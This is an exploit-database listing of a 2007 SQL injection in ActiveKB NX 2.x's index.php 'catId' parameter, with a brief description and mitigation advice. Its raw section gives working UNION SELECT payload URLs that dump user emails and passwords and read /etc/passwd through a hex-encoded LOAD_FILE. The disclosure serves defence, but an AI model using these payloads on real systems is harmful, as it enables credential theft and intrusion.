header-logo
Suggest Exploit
vendor:
ActiveKB
by:
Luna-Tic and XTErner
N/A
CVSS
HIGH
SQL Injection
CWE
Product Name: ActiveKB
Affected Version From: ActiveKB NX 2.?
Affected Version To: ActiveKB NX 2.?
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ActiveKB NX 2.? ( Powered by ActiveKB Knowledgebase Software) (index.php) SQL Injection

The ActiveKB NX 2.? software, powered by ActiveKB Knowledgebase Software, is vulnerable to SQL Injection attacks. This allows an attacker to execute arbitrary SQL commands through the 'catId' parameter in the 'index.php' file. By exploiting this vulnerability, an attacker can bypass authentication, access sensitive information, modify the database, or perform other malicious activities.

Mitigation:

To mitigate this vulnerability, it is recommended to update the ActiveKB software to the latest version or apply a patch provided by the vendor. Additionally, input validation and parameterized queries should be implemented to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

 ActiveKB NX 2.? ( Powered by ActiveKB Knowledgebase Software)  (index.php) SQL Injection

                              Discovered by Luna-Tic and XTErner 19 Years Ukrainian Hackers 

Vendor:www.interspire.com/activekb/

License:sharewere

Exploit:/kb/index.php?ToDo=browse&catId=[SQL CODE]
http://www.xxx.net/kb/index.html?ToDo=browse&catId=-20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7+from+user--
https://www.xxx.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7+members/*

# milw0rm.com [2007-09-26]

Navigation

Suggest Exploit

Services By CQR